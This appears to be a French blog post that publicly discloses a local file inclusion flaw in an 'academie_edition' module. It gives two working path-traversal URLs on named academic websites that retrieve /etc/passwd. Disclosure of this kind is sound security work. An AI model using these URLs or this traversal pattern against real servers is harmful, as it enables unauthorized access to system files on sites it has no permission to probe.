L’objectif est de faire prendre conscience de la nécessité d’une politique globale en faveur d’une sécurité transparente. Je ne saurais être tenu responsable de toutes mauvaises utilisations de ces informations dans le cas où l’entreprise n’a pas pris au sérieux mon alerte.


Cette faille LFI est simple dans sa forme, et totale puisque vous pouvez récupérer le fichier /etc/passwd avec, par exemple. Les liens concernés sont :

  • https://www.ac-sciences-lettres-montpellier.fr/academie_edition/sources/telecharger.php?rep=../../../../../../etc/&nom=passwd
  • https://academie.biu-montpellier.fr/academie_edition/sources/telecharger.php?rep=../../../../../../etc/&nom=passwd

Je confirme que cette faille concerne bien le module academie_edition.

Article Suivant Article Précédent